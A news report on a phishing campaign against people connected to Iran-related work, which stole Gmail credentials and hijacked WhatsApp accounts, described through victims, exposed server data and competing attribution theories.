A sophisticated phishing campaign targeting individuals connected to Iran related activities has been uncovered following a warning by U K based Iranian activist Nariman Gharib, who on Tuesday shared redacted screenshots of a suspicious WhatsApp message sent to him.
Gharib, who monitors the digital dimension of Iran’s ongoing protests from outside the country, cautioned people against clicking unsolicited links, noting that the attack appeared aimed at activists, journalists, academics, and other influential figures engaged with Iran focused issues.
An analysis of the phishing link by TechCrunch, supported by independent security researchers, revealed that the campaign was designed to steal Gmail and other online credentials, hijack WhatsApp accounts, and potentially conduct surveillance. The phishing page used infrastructure linked to a dynamic DNS service to disguise the true location of the malicious site, making it appear legitimate.
Investigators also discovered that the attackers had left their server exposed, allowing real time access to data entered by victims. This data showed that dozens of people had unknowingly submitted sensitive information, including passwords and two factor authentication codes.
The exposed records indicated a wide range of victims, including a Middle Eastern academic in national security studies, a senior Lebanese cabinet minister, the head of an Israeli drone company, journalists, and individuals based in or linked to the United States. In some cases, victims were tricked into scanning QR codes that could link their WhatsApp accounts to devices controlled by the attackers. Security researchers said the phishing code also attempted to request access to victims’ locations, microphones, and cameras, raising concerns about possible real time surveillance, although no such media files were found on the server.
While the phishing site has since been taken down, the identity and motive of those behind the campaign remain unclear. Some experts believe the attack bears the hallmarks of an espionage operation possibly linked to Iran’s Islamic Revolutionary Guard Corps, given the timing during nationwide protests and the targeting of high value individuals.
Others suggest the infrastructure points to a financially motivated cybercrime group, noting that Iran has previously outsourced cyber operations to criminal actors. Regardless of attribution, security experts warned that the incident underscores the growing risks of unsolicited messaging links and the heightened cyber threats surrounding geopolitical crises.